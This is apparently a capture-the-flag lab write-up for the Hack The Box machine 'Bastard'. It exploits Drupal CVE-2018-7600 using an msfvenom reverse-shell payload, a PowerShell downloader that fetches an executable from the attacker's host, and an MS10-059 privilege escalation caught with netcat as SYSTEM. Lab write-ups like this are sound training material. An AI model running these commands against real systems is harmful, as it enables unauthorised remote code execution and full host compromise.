Bastard

OS: Windows, Difficulty: Medium, IP: 10.10.10.9

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul 20 22:32:11 2019 as: nmap -sV -sC -O -A -p 80,135,49154 -oN O-detailed 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   251.65 ms 10.10.14.1
2   251.68 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 22:33:23 2019 -- 1 IP address (1 host up) scanned in 72.34 seconds

Drupal CVEs

Drupal Drupal version 7.54 : Security vulnerabilities, CVEscvedetails

Exploited CVE

CVE-2018-7602 : A remote code execution vulnerability exists within multiple subsystems of Drupacvedetails

GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600GitHub

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.8 LPORT=9999 -f exe > exploit_rev.exe

Created a simple reverse shell to be delivered to the machine.

Create a PS1 file that will download my exploit to the system
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'cmd.exe /c "@echo $webclient = New-Object System.Net.WebClient>wget.ps1&@echo $url = "http://10.10.14.8/syst.exe">>wget.ps1&@echo $file = "syst.exe">>wget.ps1&@echo $webclient.DownloadFile($url,$file)>>wget.ps1&@type wget.ps1"'

Execute the PS1 file to actually download the exploit
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'

Execute the downlaoded exploit
-----------------
./drupa7-CVE-2018-7600.py http://10.10.10.9 -c 'syst.exe'

I caught this reverse shell using meterpreter (exploit/multi/handler)

Got the system information and used Windows Exploit Suggester

GitHub - strozfriedberg/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub

./wes.py -d 2019-07-21-mssb.xls -i ../systeminfo | tee ../wes.out                                                                                    
[*] initiating winsploit version 3.3...                                                                                                                
[*] database file detected as xls or xlsx based on extension                                                                                           
[*] attempting to read from the systeminfo input file                                                                                                  
[+] systeminfo input file read successfully (ascii)                                                                                                    
[*] querying database file for potential vulnerabilities                                                                                               
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits                                            
[*] there are now 197 remaining vulns                                                                                                                  
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin                                                                                     
[+] windows version identified as 'Windows 2008 R2 64-bit'                                                                                             
[*]                                                                                                                                                    
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical                                                                    
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important                                     
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical                                                                    
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC                               
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC            
[*]                                                                                                                                                    
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important            
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

windows-kernel-exploits/MS10-059 at master · SecWiki/windows-kernel-exploitsGitHub

Only MS10-059 seemed to work, so I used to earlier mentioned way to deliver the exploit binary and ran it to get shell as NT/System. [This was a reverse shell exploit, so had to catch it using NC]

nc -lvnp 8989                                                                                                                                        
listening on [any] 8989 ...                                                                                                                            
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49519                                                                                              
Microsoft Windows [Version 6.1.7600]                                                                                                                   
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                                                                                        
                                                                                                                                                       
C:\inetpub\drupal-7.54>whoami                                                                                                                          
whoami                                                                                                                                                 
nt authority\system                       

User Own

C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22f***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt                                                                                                       
type root.txt.txt                                                                                                                                      
4bf12***

Learning Outcome

Delivering exploits, WGETs, or any other thing, is a very tedious task, if you do not have a meterpreter staged shell. Apart from that exploit reliability is very finicky. Overall a good box, made me think a little about exploit delivery and sessions management.